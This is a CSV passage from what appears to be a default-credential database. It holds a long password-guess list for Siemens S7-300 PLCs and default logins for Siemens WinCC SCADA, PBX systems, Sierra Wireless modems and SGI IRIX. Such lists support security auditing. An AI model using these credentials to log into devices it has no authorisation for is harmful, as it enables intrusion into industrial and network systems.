s7-300,,,,,cisco,,,\nsiemens s7-300,,,,,citel,,,\nsiemens s7-300,,,,,client,,,\nsiemens s7-300,,,,,cmaker,,,\nsiemens s7-300,,,,,cms500,,,\nsiemens s7-300,,,,,cnas,,,\nsiemens s7-300,,,,,cody,,,\nsiemens s7-300,,,,,cognos,,,\nsiemens s7-300,,,,,computer,,,\nsiemens s7-300,,,,,connect,,,\nsiemens s7-300,,,,,conv,,,\nsiemens s7-300,,,,,cool,,,\nsiemens s7-300,,,,,corecess,,,\nsiemens s7-300,,,,,cosmos,,,\nsiemens s7-300,,,,,craft,,,\nsiemens s7-300,,,,,craftpw,,,\nsiemens s7-300,,,,,crftpw,,,\nsiemens s7-300,,,,,crystal,,,\nsiemens s7-300,,,,,ct/1,,,\nsiemens s7-300,,,,,customer,,,\nsiemens s7-300,,,,,custpw,,,\nsiemens s7-300,,,,,d,,,\nsiemens s7-300,,,,,d.e.b.u.g,,,\nsiemens s7-300,,,,,d00m,,,\nsiemens s7-300,,,,,dadmin01,,,\nsiemens s7-300,,,,,danger,,,\nsiemens s7-300,,,,,database,,,\nsiemens s7-300,,,,,davox,,,\nsiemens s7-300,,,,,dbps,,,\nsiemens s7-300,,,,,dd,,,\nsiemens s7-300,,,,,ddd,,,\nsiemens s7-300,,,,,dddd,,,\nsiemens s7-300,,,,,ddddd,,,\nsiemens s7-300,,,,,dddddd,,,\nsiemens s7-300,,,,,ddddddd,,,\nsiemens s7-300,,,,,dddddddd,,,\nsiemens s7-300,,,,,dean,,,\nsiemens s7-300,,,,,default,,,\nsiemens s7-300,,,,,delevan,,,\nsiemens s7-300,,,,,demo,,,\nsiemens s7-300,,,,,denise,,,\nsiemens s7-300,,,,,derparol,,,\nsiemens s7-300,,,,,device,,,\nsiemens s7-300,,,,,devices,,,\nsiemens s7-300,,,,,dhs3mt,,,\nsiemens s7-300,,,,,dhs3pms,,,\nsiemens s7-300,,,,,diabl0,,,\nsiemens s7-300,,,,,diablo,,,\nsiemens s7-300,,,,,diamond,,,\nsiemens s7-300,,,,,digital,,,\nsiemens s7-300,,,,,dlink,,,\nsiemens s7-300,,,,,dollar,,,\nsiemens s7-300,,,,,doom,,,\nsiemens s7-300,,,,,draadloos,,,\nsiemens s7-300,,,,,drivees,,,\nsiemens s7-300,,,,,e,,,\nsiemens s7-300,,,,,echo,,,\nsiemens s7-300,,,,,ee,,,\nsiemens s7-300,,,,,eee,,,\nsiemens s7-300,,,,,eeee,,,\nsiemens s7-300,,,,,eeeee,,,\nsiemens s7-300,,,,,eeeeee,,,\nsiemens s7-300,,,,,eeeeeee,,,\nsiemens s7-300,,,,,eeeeeeee,,,\nsiemens s7-300,,,,,electrin,,,\nsiemens s7-300,,,,,elvis,,,\nsiemens s7-300,,,,,enable,,,\nsiemens s7-300,,,,,energy,,,\nsiemens s7-300,,,,,engineer,,,\nsiemens s7-300,,,,,eqdfv,,,\nsiemens s7-300,,,,,err0r,,,\nsiemens s7-300,,,,,error,,,\nsiemens s7-300,,,,,evening,,,\nsiemens s7-300,,,,,expert03,,,\nsiemens s7-300,,,,,f,,,\nsiemens s7-300,,,,,father,,,\nsiemens s7-300,,,,,fbd,,,\nsiemens s7-300,,,,,ff,,,\nsiemens s7-300,,,,,fff,,,\nsiemens s7-300,,,,,ffff,,,\nsiemens s7-300,,,,,fffff,,,\nsiemens s7-300,,,,,ffffff,,,\nsiemens s7-300,,,,,fffffff,,,\nsiemens s7-300,,,,,ffffffff,,,\nsiemens s7-300,,,,,field,,,\nsiemens s7-300,,,,,fire,,,\nsiemens s7-300,,,,,fish,,,\nsiemens s7-300,,,,,fivranne,,,\nsiemens s7-300,,,,,flash,,,\nsiemens s7-300,,,,,flex,,,\nsiemens s7-300,,,,,flexible,,,\nsiemens s7-300,,,,,football,,,\nsiemens s7-300,,,,,friend,,,\nsiemens s7-300,,,,,fuck,,,\nsiemens s7-300,,,,,fuckoff,,,\nsiemens s7-300,,,,,fuckyou,,,\nsiemens s7-300,,,,,g,,,\nsiemens s7-300,,,,,g00gle,,,\nsiemens s7-300,,,,,gama,,,\nsiemens s7-300,,,,,ganteng,,,\nsiemens s7-300,,,,,gen1,,,\nsiemens s7-300,,,,,gen2,,,\nsiemens s7-300,,,,,gfcc,,,\nsiemens s7-300,,,,,gfccdjhl,,,\nsiemens s7-300,,,,,gfhjkm,,,\nsiemens s7-300,,,,,gg,,,\nsiemens s7-300,,,,,ggg,,,\nsiemens s7-300,,,,,gggg,,,\nsiemens s7-300,,,,,ggggg,,,\nsiemens s7-300,,,,,gggggg,,,\nsiemens s7-300,,,,,ggggggg,,,\nsiemens s7-300,,,,,gggggggg,,,\nsiemens s7-300,,,,,ghbdtn,,,\nsiemens s7-300,,,,,ghost,,,\nsiemens s7-300,,,,,goal,,,\nsiemens s7-300,,,,,golf,,,\nsiemens s7-300,,,,,google,,,\nsiemens s7-300,,,,,got,,,\nsiemens s7-300,,,,,guest,,,\nsiemens s7-300,,,,,h,,,\nsiemens s7-300,,,,,hardware,,,\nsiemens s7-300,,,,,harley,,,\nsiemens s7-300,,,,,helen,,,\nsiemens s7-300,,,,,hello,,,\nsiemens s7-300,,,,,help,,,\nsiemens s7-300,,,,,help1954,,,\nsiemens s7-300,,,,,hexseal,,,\nsiemens s7-300,,,,,hh,,,\nsiemens s7-300,,,,,hhh,,,\nsiemens s7-300,,,,,hhhh,,,\nsiemens s7-300,,,,,hhhhh,,,\nsiemens s7-300,,,,,hhhhhh,,,\nsiemens s7-300,,,,,hhhhhhh,,,\nsiemens s7-300,,,,,hhhhhhhh,,,\nsiemens s7-300,,,,,highspeed,,,\nsiemens s7-300,,,,,hinear,,,\nsiemens s7-300,,,,,home,,,\nsiemens s7-300,,,,,homeplug,,,\nsiemens s7-300,,,,,honda,,,\nsiemens s7-300,,,,,hp.com,,,\nsiemens s7-300,,,,,hpoffice,,,\nsiemens s7-300,,,,,hponly,,,\nsiemens s7-300,,,,,hrloo,,,\nsiemens s7-300,,,,,hsadb,,,\nsiemens s7-300,,,,,http,,,\nsiemens s7-300,,,,,i,,,\nsiemens s7-300,,,,,iDirect,,,\nsiemens s7-300,,,,,ii,,,\nsiemens s7-300,,,,,iii,,,\nsiemens s7-300,,,,,iiii,,,\nsiemens s7-300,,,,,iiiii,,,\nsiemens s7-300,,,,,iiiiii,,,\nsiemens s7-300,,,,,iiiiiii,,,\nsiemens s7-300,,,,,iiiiiiii,,,\nsiemens s7-300,,,,,iloveyou,,,\nsiemens s7-300,,,,,images,,,\nsiemens s7-300,,,,,inads,,,\nsiemens s7-300,,,,,inc,,,\nsiemens s7-300,,,,,indspw,,,\nsiemens s7-300,,,,,inferno,,,\nsiemens s7-300,,,,,initpw,,,\nsiemens s7-300,,,,,inmet,,,\nsiemens s7-300,,,,,internet,,,\nsiemens s7-300,,,,,ironport,,,\nsiemens s7-300,,,,,isee,,,\nsiemens s7-300,,,,,isp,,,\nsiemens s7-300,,,,,j,,,\nsiemens s7-300,,,,,jack,,,\nsiemens s7-300,,,,,janet,,,\nsiemens s7-300,,,,,jannie,,,\nsiemens s7-300,,,,,jasmine,,,\nsiemens s7-300,,,,,jj,,,\nsiemens s7-300,,,,,jjj,,,\nsiemens s7-300,,,,,jjjj,,,\nsiemens s7-300,,,,,jjjjj,,,\nsiemens s7-300,,,,,jjjjjj,,,\nsiemens s7-300,,,,,jjjjjjj,,,\nsiemens s7-300,,,,,jjjjjjjj,,,\nsiemens s7-300,,,,,john,,,\nsiemens s7-300,,,,,joker,,,\nsiemens s7-300,,,,,jordan,,,\nsiemens s7-300,,,,,jordan23,,,\nsiemens s7-300,,,,,k,,,\nsiemens s7-300,,,,,kermit,,,\nsiemens s7-300,,,,,killer,,,\nsiemens s7-300,,,,,killme,,,\nsiemens s7-300,,,,,kilo1987,,,\nsiemens s7-300,,,,,kk,,,\nsiemens s7-300,,,,,kkk,,,\nsiemens s7-300,,,,,kkkk,,,\nsiemens s7-300,,,,,kkkkk,,,\nsiemens s7-300,,,,,kkkkkk,,,\nsiemens s7-300,,,,,kkkkkkk,,,\nsiemens s7-300,,,,,kkkkkkkk,,,\nsiemens s7-300,,,,,korn,,,\nsiemens s7-300,,,,,l,,,\nsiemens s7-300,,,,,lad,,,\nsiemens s7-300,,,,,laflaf,,,\nsiemens s7-300,,,,,letacla,,,\nsiemens s7-300,,,,,letmein,,,\nsiemens s7-300,,,,,level1,,,\nsiemens s7-300,,,,,leviton,,,\nsiemens s7-300,,,,,linga,,,\nsiemens s7-300,,,,,linux,,,\nsiemens s7-300,,,,,lisa,,,\nsiemens s7-300,,,,,ll,,,\nsiemens s7-300,,,,,llatsni,,,\nsiemens s7-300,,,,,lll,,,\nsiemens s7-300,,,,,llll,,,\nsiemens s7-300,,,,,lllll,,,\nsiemens s7-300,,,,,llllll,,,\nsiemens s7-300,,,,,lllllll,,,\nsiemens s7-300,,,,,llllllll,,,\nsiemens s7-300,,,,,locatepw,,,\nsiemens s7-300,,,,,lock,,,\nsiemens s7-300,,,,,login,,,\nsiemens s7-300,,,,,looker,,,\nsiemens s7-300,,,,,lotus,,,\nsiemens s7-300,,,,,love,,,\nsiemens s7-300,,,,,ltd,,,\nsiemens s7-300,,,,,lucky,,,\nsiemens s7-300,,,,,m,,,\nsiemens s7-300,,,,,m1122,,,\nsiemens s7-300,,,,,mail,,,\nsiemens s7-300,,,,,maint,,,\nsiemens s7-300,,,,,maintpw,,,\nsiemens s7-300,,,,,manager,,,\nsiemens s7-300,,,,,maniac,,,\nsiemens s7-300,,,,,master,,,\nsiemens s7-300,,,,,masterkey,,,\nsiemens s7-300,,,,,mediator,,,\nsiemens s7-300,,,,,medion,,,\nsiemens s7-300,,,,,micro,,,\nsiemens s7-300,,,,,microwav,,,\nsiemens s7-300,,,,,miller,,,\nsiemens s7-300,,,,,mis,,,\nsiemens s7-300,,,,,mlusr,,,\nsiemens s7-300,,,,,mm,,,\nsiemens s7-300,,,,,mmm,,,\nsiemens s7-300,,,,,mmmm,,,\nsiemens s7-300,,,,,mmmmm,,,\nsiemens s7-300,,,,,mmmmmm,,,\nsiemens s7-300,,,,,mmmmmmm,,,\nsiemens s7-300,,,,,mmmmmmmm,,,\nsiemens s7-300,,,,,modul,,,\nsiemens s7-300,,,,,module,,,\nsiemens s7-300,,,,,money,,,\nsiemens s7-300,,,,,monitor,,,\nsiemens s7-300,,,,,monkey,,,\nsiemens s7-300,,,,,mosmatic,,,\nsiemens s7-300,,,,,mother,,,\nsiemens s7-300,,,,,motorola,,,\nsiemens s7-300,,,,,mouse,,,\nsiemens s7-300,,,,,mtch,,,\nsiemens s7-300,,,,,mustang,,,\nsiemens s7-300,,,,,mypass,,,\nsiemens s7-300,,,,,mypass123,,,\nsiemens s7-300,,,,,mypc,,,\nsiemens s7-300,,,,,mypc123,,,\nsiemens s7-300,,,,,myspace,,,\nsiemens s7-300,,,,,myspace1,,,\nsiemens s7-300,,,,,n,,,\nsiemens s7-300,,,,,naadmin,,,\nsiemens s7-300,,,,,naranja,,,\nsiemens s7-300,,,,,netadmin,,,\nsiemens s7-300,,,,,netbase,,,\nsiemens s7-300,,,,,netman,,,\nsiemens s7-300,,,,,netopia,,,\nsiemens s7-300,,,,,netscreen,,,\nsiemens s7-300,,,,,netutil,,,\nsiemens s7-300,,,,,network,,,\nsiemens s7-300,,,,,newpass,,,\nsiemens s7-300,,,,,niconex,,,\nsiemens s7-300,,,,,nimdaten,,,\nsiemens s7-300,,,,,nmspw,,,\nsiemens s7-300,,,,,nn,,,\nsiemens s7-300,,,,,nnn,,,\nsiemens s7-300,,,,,nnnn,,,\nsiemens s7-300,,,,,nnnnn,,,\nsiemens s7-300,,,,,nnnnnn,,,\nsiemens s7-300,,,,,nnnnnnn,,,\nsiemens s7-300,,,,,nnnnnnnn,,,\nsiemens s7-300,,,,,nokai,,,\nsiemens s7-300,,,,,notused,,,\nsiemens s7-300,,,,,noway,,,\nsiemens s7-300,,,,,ntacdmax,,,\nsiemens s7-300,,,,,null,,,\nsiemens s7-300,,,,,o,,,\nsiemens s7-300,,,,,oem,,,\nsiemens s7-300,,,,,omron,,,\nsiemens s7-300,,,,,oo,,,\nsiemens s7-300,,,,,ooo,,,\nsiemens s7-300,,,,,oooo,,,\nsiemens s7-300,,,,,ooooo,,,\nsiemens s7-300,,,,,oooooo,,,\nsiemens s7-300,,,,,ooooooo,,,\nsiemens s7-300,,,,,oooooooo,,,\nsiemens s7-300,,,,,op3n,,,\nsiemens s7-300,,,,,operator,,,\nsiemens s7-300,,,,,owner,,,\nsiemens s7-300,,,,,p,,,\nsiemens s7-300,,,,,pas,,,\nsiemens s7-300,,,,,pass,,,\nsiemens s7-300,,,,,passage,,,\nsiemens s7-300,,,,,passw,,,\nsiemens s7-300,,,,,passwd,,,\nsiemens s7-300,,,,,passwo,,,\nsiemens s7-300,,,,,passwor,,,\nsiemens s7-300,,,,,password,,,\nsiemens s7-300,,,,,pat,,,\nsiemens s7-300,,,,,paterna,,,\nsiemens s7-300,,,,,patrick,,,\nsiemens s7-300,,,,,patrol,,,\nsiemens s7-300,,,,,pbxk1064,,,\nsiemens s7-300,,,,,pcs7,,,\nsiemens s7-300,,,,,pentium,,,\nsiemens s7-300,,,,,pento,,,\nsiemens s7-300,,,,,pepper,,,\nsiemens s7-300,,,,,pepsi,,,\nsiemens s7-300,,,,,permit,,,\nsiemens s7-300,,,,,personal,,,\nsiemens s7-300,,,,,pfsense,,,\nsiemens s7-300,,,,,photonix,,,\nsiemens s7-300,,,,,pilou,,,\nsiemens s7-300,,,,,piranha,,,\nsiemens s7-300,,,,,plc,,,\nsiemens s7-300,,,,,plcsim,,,\nsiemens s7-300,,,,,poerty,,,\nsiemens s7-300,,,,,policy,,,\nsiemens s7-300,,,,,power,,,\nsiemens s7-300,,,,,pp,,,\nsiemens s7-300,,,,,ppp,,,\nsiemens s7-300,,,,,pppp,,,\nsiemens s7-300,,,,,ppppp,,,\nsiemens s7-300,,,,,pppppp,,,\nsiemens s7-300,,,,,ppppppp,,,\nsiemens s7-300,,,,,pppppppp,,,\nsiemens s7-300,,,,,princess,,,\nsiemens s7-300,,,,,private,,,\nsiemens s7-300,,,,,proddta,,,\nsiemens s7-300,,,,,profibus,,,\nsiemens s7-300,,,,,protool,,,\nsiemens s7-300,,,,,public,,,\nsiemens s7-300,,,,,pusy,,,\nsiemens s7-300,,,,,pw123,,,\nsiemens s7-300,,,,,pwd,,,\nsiemens s7-300,,,,,q,,,\nsiemens s7-300,,,,,qawsed,,,\nsiemens s7-300,,,,,qq,,,\nsiemens s7-300,,,,,qq520,,,\nsiemens s7-300,,,,,qqq,,,\nsiemens s7-300,,,,,qqqq,,,\nsiemens s7-300,,,,,qqqqq,,,\nsiemens s7-300,,,,,qqqqqq,,,\nsiemens s7-300,,,,,qqqqqqq,,,\nsiemens s7-300,,,,,qqqqqqqq,,,\nsiemens s7-300,,,,,qwe,,,\nsiemens s7-300,,,,,qwer,,,\nsiemens s7-300,,,,,qwerty,,,\nsiemens s7-300,,,,,qwerty1,,,\nsiemens s7-300,,,,,qwertyu,,,\nsiemens s7-300,,,,,qwertyui,,,\nsiemens s7-300,,,,,r,,,\nsiemens s7-300,,,,,r@p8p0r+,,,\nsiemens s7-300,,,,,rade0n,,,\nsiemens s7-300,,,,,radius,,,\nsiemens s7-300,,,,,radware,,,\nsiemens s7-300,,,,,rdfhnbhf,,,\nsiemens s7-300,,,,,recovery,,,\nsiemens s7-300,,,,,rego,,,\nsiemens s7-300,,,,,remote,,,\nsiemens s7-300,,,,,rip000,,,\nsiemens s7-300,,,,,rittal,,,\nsiemens s7-300,,,,,robele,,,\nsiemens s7-300,,,,,root,,,\nsiemens s7-300,,,,,router,,,\nsiemens s7-300,,,,,rr,,,\nsiemens s7-300,,,,,rrr,,,\nsiemens s7-300,,,,,rrrr,,,\nsiemens s7-300,,,,,rrrrr,,,\nsiemens s7-300,,,,,rrrrrr,,,\nsiemens s7-300,,,,,rrrrrrr,,,\nsiemens s7-300,,,,,rrrrrrrr,,,\nsiemens s7-300,,,,,rs4igoy,,,\nsiemens s7-300,,,,,rtyhn,,,\nsiemens s7-300,,,,,run-p,,,\nsiemens s7-300,,,,,russia,,,\nsiemens s7-300,,,,,rwmaint,,,\nsiemens s7-300,,,,,s,,,\nsiemens s7-300,,,,,s7,,,\nsiemens s7-300,,,,,s7-300,,,\nsiemens s7-300,,,,,s7-400,,,\nsiemens s7-300,,,,,scout,,,\nsiemens s7-300,,,,,search,,,\nsiemens s7-300,,,,,secret,,,\nsiemens s7-300,,,,,secure,,,\nsiemens s7-300,,,,,security,,,\nsiemens s7-300,,,,,sekret,,,\nsiemens s7-300,,,,,serco,,,\nsiemens s7-300,,,,,serial#,,,\nsiemens s7-300,,,,,serovox,,,\nsiemens s7-300,,,,,server,,,\nsiemens s7-300,,,,,setherco,,,\nsiemens s7-300,,,,,setup,,,\nsiemens s7-300,,,,,sex,,,\nsiemens s7-300,,,,,sgena,,,\nsiemens s7-300,,,,,sgilent,,,\nsiemens s7-300,,,,,shadow,,,\nsiemens s7-300,,,,,sicostart,,,\nsiemens s7-300,,,,,siemens,,,\nsiemens s7-300,,,,,simatic,,,\nsiemens s7-300,,,,,simens,,,\nsiemens s7-300,,,,,simo,,,\nsiemens s7-300,,,,,simocode,,,\nsiemens s7-300,,,,,simoreg,,,\nsiemens s7-300,,,,,simovert,,,\nsiemens s7-300,,,,,simtec,,,\nsiemens s7-300,,,,,sirborn,,,\nsiemens s7-300,,,,,sitop,,,\nsiemens s7-300,,,,,slave,,,\nsiemens s7-300,,,,,slipknot,,,\nsiemens s7-300,,,,,smile,,,\nsiemens s7-300,,,,,smuser,,,\nsiemens s7-300,,,,,snoopy,,,\nsiemens s7-300,,,,,soccer,,,\nsiemens s7-300,,,,,solution,,,\nsiemens s7-300,,,,,ss,,,\nsiemens s7-300,,,,,sss,,,\nsiemens s7-300,,,,,ssss,,,\nsiemens s7-300,,,,,sssss,,,\nsiemens s7-300,,,,,ssssss,,,\nsiemens s7-300,,,,,sssssss,,,\nsiemens s7-300,,,,,ssssssss,,,\nsiemens s7-300,,,,,stan,,,\nsiemens s7-300,,,,,star,,,\nsiemens s7-300,,,,,starwar,,,\nsiemens s7-300,,,,,step5,,,\nsiemens s7-300,,,,,step7,,,\nsiemens s7-300,,,,,stimpy,,,\nsiemens s7-300,,,,,stl,,,\nsiemens s7-300,,,,,stop,,,\nsiemens s7-300,,,,,ststic,,,\nsiemens s7-300,,,,,summer,,,\nsiemens s7-300,,,,,sunrise,,,\nsiemens s7-300,,,,,superid,,,\nsiemens s7-300,,,,,superman,,,\nsiemens s7-300,,,,,support,,,\nsiemens s7-300,,,,,surt,,,\nsiemens s7-300,,,,,switch,,,\nsiemens s7-300,,,,,sybase,,,\nsiemens s7-300,,,,,synnet,,,\nsiemens s7-300,,,,,sysadm,,,\nsiemens s7-300,,,,,sysdisk,,,\nsiemens s7-300,,,,,system,,,\nsiemens s7-300,,,,,t,,,\nsiemens s7-300,,,,,talent,,,\nsiemens s7-300,,,,,talisman,,,\nsiemens s7-300,,,,,tech,,,\nsiemens s7-300,,,,,telco,,,\nsiemens s7-300,,,,,telecom,,,\nsiemens s7-300,,,,,telesup,,,\nsiemens s7-300,,,,,tellabs#1,,,\nsiemens s7-300,,,,,telus,,,\nsiemens s7-300,,,,,temp,,,\nsiemens s7-300,,,,,temp123,,,\nsiemens s7-300,,,,,test,,,\nsiemens s7-300,,,,,test123,,,\nsiemens s7-300,,,,,thomas,,,\nsiemens s7-300,,,,,tiaranet,,,\nsiemens s7-300,,,,,tiger123,,,\nsiemens s7-300,,,,,timely,,,\nsiemens s7-300,,,,,tini,,,\nsiemens s7-300,,,,,tivonpw,,,\nsiemens s7-300,,,,,tjm,,,\nsiemens s7-300,,,,,tlah,,,\nsiemens s7-300,,,,,toolset,,,\nsiemens s7-300,,,,,trancell,,,\nsiemens s7-300,,,,,tratata,,,\nsiemens s7-300,,,,,tslinux,,,\nsiemens s7-300,,,,,tt,,,\nsiemens s7-300,,,,,ttt,,,\nsiemens s7-300,,,,,tttt,,,\nsiemens s7-300,,,,,ttttt,,,\nsiemens s7-300,,,,,tttttt,,,\nsiemens s7-300,,,,,ttttttt,,,\nsiemens s7-300,,,,,tttttttt,,,\nsiemens s7-300,,,,,tuborg,,,\nsiemens s7-300,,,,,tuxalize,,,\nsiemens s7-300,,,,,tx100,,,\nsiemens s7-300,,,,,u,,,\nsiemens s7-300,,,,,uplink,,,\nsiemens s7-300,,,,,user,,,\nsiemens s7-300,,,,,uu,,,\nsiemens s7-300,,,,,uuu,,,\nsiemens s7-300,,,,,uuuu,,,\nsiemens s7-300,,,,,uuuuu,,,\nsiemens s7-300,,,,,uuuuuu,,,\nsiemens s7-300,,,,,uuuuuuu,,,\nsiemens s7-300,,,,,uuuuuuuu,,,\nsiemens s7-300,,,,,v,,,\nsiemens s7-300,,,,,vesoft,,,\nsiemens s7-300,,,,,visual,,,\nsiemens s7-300,,,,,vjqgfhjkm,,,\nsiemens s7-300,,,,,vodka,,,\nsiemens s7-300,,,,,volition,,,\nsiemens s7-300,,,,,vv,,,\nsiemens s7-300,,,,,vvv,,,\nsiemens s7-300,,,,,vvvv,,,\nsiemens s7-300,,,,,vvvvv,,,\nsiemens s7-300,,,,,vvvvvv,,,\nsiemens s7-300,,,,,vvvvvvv,,,\nsiemens s7-300,,,,,vvvvvvvv,,,\nsiemens s7-300,,,,,w,,,\nsiemens s7-300,,,,,webadmin,,,\nsiemens s7-300,,,,,win,,,\nsiemens s7-300,,,,,wincc,,,\nsiemens s7-300,,,,,winterm,,,\nsiemens s7-300,,,,,wizard,,,\nsiemens s7-300,,,,,wlsedb,,,\nsiemens s7-300,,,,,wolf,,,\nsiemens s7-300,,,,,ww,,,\nsiemens s7-300,,,,,www,,,\nsiemens s7-300,,,,,wwww,,,\nsiemens s7-300,,,,,wwwww,,,\nsiemens s7-300,,,,,wwwwww,,,\nsiemens s7-300,,,,,wwwwwww,,,\nsiemens s7-300,,,,,wwwwwwww,,,\nsiemens s7-300,,,,,wyse,,,\nsiemens s7-300,,,,,x,,,\nsiemens s7-300,,,,,x-admin,,,\nsiemens s7-300,,,,,x40rocks,,,\nsiemens s7-300,,,,,xbox,,,\nsiemens s7-300,,,,,xlserver,,,\nsiemens s7-300,,,,,xx,,,\nsiemens s7-300,,,,,xxx,,,\nsiemens s7-300,,,,,xxxx,,,\nsiemens s7-300,,,,,xxxxx,,,\nsiemens s7-300,,,,,xxxxxx,,,\nsiemens s7-300,,,,,xxxxxxx,,,\nsiemens s7-300,,,,,xxxxxxxx,,,\nsiemens s7-300,,,,,xxyyzz,,,\nsiemens s7-300,,,,,y,,,\nsiemens s7-300,,,,,yxcv,,,\nsiemens s7-300,,,,,yy,,,\nsiemens s7-300,,,,,yyy,,,\nsiemens s7-300,,,,,yyyy,,,\nsiemens s7-300,,,,,yyyyy,,,\nsiemens s7-300,,,,,yyyyyy,,,\nsiemens s7-300,,,,,yyyyyyy,,,\nsiemens s7-300,,,,,yyyyyyyy,,,\nsiemens s7-300,,,,,z,,,\nsiemens s7-300,,,,,z0ne,,,\nsiemens s7-300,,,,,zettler,,,\nsiemens s7-300,,,,,zippo,,,\nsiemens s7-300,,,,,zone,,,\nsiemens s7-300,,,,,zoomadsl,,,\nsiemens s7-300,,,,,zorro,,,\nsiemens s7-300,,,,,zorromen,,,\nsiemens s7-300,,,,,zxc,,,\nsiemens s7-300,,,,,zxcv,,,\nsiemens s7-300,,,,,zxcvb,,,\nsiemens s7-300,,,,,zxcvbn,,,\nsiemens s7-300,,,,,zxcvbnm,,,\nsiemens s7-300,,,,,zxcvbnm,,,,\nsiemens s7-300,,,,,zz,,,\nsiemens s7-300,,,,,zzz,,,\nsiemens s7-300,,,,,zzzz,,,\nsiemens s7-300,,,,,zzzzz,,,\nsiemens s7-300,,,,,zzzzzz,,,\nsiemens s7-300,,,,,zzzzzzz,,,\nsiemens s7-300,,,,,zzzzzzzz,,,\nsiemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin,,\nsiemens,APACS,,ACM Controller,,gubed,,,\nsiemens,Gigaset A580IP,,,,0000,Admin,,\nsiemens,Gigaset C470IP,,,,0000,Admin,,\nsiemens,Gigaset C475IP,,192.168,2,2,,Admin,\nsiemens,Gigaset S685IP,,,,0000,Admin,,\nsiemens,Gigaset SX541 WLAN dsl,,http://192.168.2.1,,admin,Admin,,\nsiemens,Gigaset SX762,,,,admin,,,\nsiemens,HIPATH 3800,V9,DIRECT,31994,31994,31994,,\nsiemens,HiPath 3000,,,31994,31994,,,\nsiemens,HiPath 3000,,Manager,office,office,,,\nsiemens,HiPath 3000,,Multi,31994,31994,,,\nsiemens,Hipath,,Multi,,,Admin,,\nsiemens,OpenStage SIP Webinterface,,,,123456,,,\nsiemens,Optipoint,,,,123456,,,\nsiemens,Optipoint,,Multi,,123456,,,\nsiemens,PC BIOS,,,,SKY_FOX,CMOS,,\nsiemens,PhoneMail,,,poll,tech,,,\nsiemens,PhoneMail,,,sysadmin,sysadmin,,,\nsiemens,PhoneMail,,,tech,tech,,,\nsiemens,Phonemail,,,tech,field,,,\nsiemens,Phonemail,,Multi,tech,field,,,\nsiemens,QUADLOG,,CCM Controller,,gubed,,,\nsiemens,ROLM PBX,,,admin,pwp,,,\nsiemens,ROLM PBX,,,eng,engineer,,,\nsiemens,ROLM PBX,,,op,op,,,\nsiemens,ROLM PBX,,,op,operator,,,\nsiemens,ROLM PBX,,,su,super,,,\nsiemens,S7,,,basisk,basisk,,,\nsiemens,SE515,,,admin,,,,\nsiemens,SE515,,HTTP,admin,,,,\nsiemens,Siemens Nixdorf 8818 PBX,,,,uboot,,,\nsiemens,Siemens Nixdorf Hicom 100E PBX,,,31994,31994,,,\nsiemens,Siemens Nixdorf Hicom 150E PBX,,,31994,31994,,,\nsiemens,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,,\nsiemens,Siemens Pro C5,,Multi,,,Admin,,\nsiemens,Simatic WinCC SCADA,,,WinCCAdmin,2WSXcder,,,\nsiemens,Simatic WinCC SCADA,,,WinCCConnect,2WSXcder,,,\nsiemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router,\nsiemens,SpeedStream 4200,Bigpond,10.0.0.138,admin,admin,Admin,,\nsiemens,SpeedStream 4200,Generic,192.168.254.254,admin,,Admin,,\nsiemens,SpeedStream 4200,OptusNet,10.1.1.1,admin,,Admin,,\nsiemens,SpeedStream 5100,,192.168.254,254,admin,admin,2012-01-10,\nsiemens,SpeedStream 5200,,192.168.254,254,admin,admin,2012-01-10,\nsiemens,SpeedStream 5450,,192.168.254,254,admin,,2012-01-10,\nsiemens,SpeedStream 6520,,192.168.254,254 or 10.0.0.138,admin,admin,2012-01-10,\nsiemens,WinCC,,,WinCCAdmin,2WSXcde.,,,\nsiemens,WinCC,,,WinCCConnect,2WSXcder,,,\nsiemens,hipath,,,,,,,\nsiemens,hipath,,Admin,,,,,\nsiemens,hipath,,Multi,,,Admin,,\nsiemensnixdorf,8818 PBX,,,,uboot,,,\nsiemensnixdorf,Hicom 100E PBX,,,31994,31994,,,\nsiemensnixdorf,Hicom 150E PBX,,,31994,31994,,,\nsiemensnixdorf,PC BIOS,,Console,,SKY_FOX,Admin,,\nsierrawireless,ACEmanager,,,user,12345,,,\nsierrawireless,AirCard 753S,,10.0.0.138,admin,admin,Admin,,\nsierrawireless,AirCard 760S,Bigpond,10.0.0.138,admin,admin,Admin,also http://bigpond.4g,\nsierrawireless,AirCard 760S,Telstra,192.168.1.1,admin,admin,Admin,also http://telstra.4g,\nsierrawireless,AirLink Helix,,192.168.2.1,admin,12345,Admin,,\nsierrawireless,BigPond Ultimate Mobile Broadband Wi-Fi,,,,admin,Admin,,\nsierrawireless,GX400,,192.168.13.31 or 192.168.14.31,user,12345,AceManager,,\nsierrawireless,GX440,,192.168.13.31 or 192.168.14.31,user,12345,AceManager,,\nsierrawireless,Telstra Ultimate Mobile Broadband Wi-Fi,,,,Admin_Ultimate,Admin,,\nsierrawireless,W801,Time Warner / Roadrunner,http://twc4gmobile,,password,Admin,,\nsigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,,\nsigmatel,s3+,s3+,,,1221,,can be change but try it,\nsigmatel,s3+,s3+,,,1221,,can be change,\nsiips,Trojan,,8974202,Administrator,ganteng,,,\nsiips,Trojan,,Admin,Administrator,ganteng,,,\nsiips,Trojan,8974202,Multi,Administrator,ganteng,Admin,,\nsiips,Trojan,8974202,Multi,Administrator,ganteng,Admin,Thx,\nsilextechnology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP,\nsilextechnology,USB Device Server,,,root,(non),,,\nsilicon graphics,IRIX,,,4Dgifts,,,,\nsilicon graphics,IRIX,,,6.x,,,,\nsilicon graphics,IRIX,,,Ezsetup,,,,\nsilicon graphics,IRIX,,,OutOfBox,,,,\nsilicon graphics,IRIX,,,demos,,,,\nsilicon graphics,IRIX,,,field,field,,,\nsilicon graphics,IRIX,,,tour,tour,,,\nsilicon graphics,IRIX,,,tutor,,,,\nsilicon graphics,IRIX,,5.x 6.x,guest,,,,\nsilicon graphics,IRIX,,5.x 6.x,lp,,,,\nsilicon graphics,IRIX,,Admin,4Dgifts,,,,\nsilicon graphics,IRIX,,Admin,4Dgifts,4Dgifts,,,\nsilicon graphics,IRIX,,Admin,Ezsetup,,,,\nsilicon graphics,IRIX,,Admin,OutOfBox,,,,\nsilicon graphics,IRIX,,Admin,demos,,,,\nsilicon graphics,IRIX,,Admin,field,field,,,\nsilicon 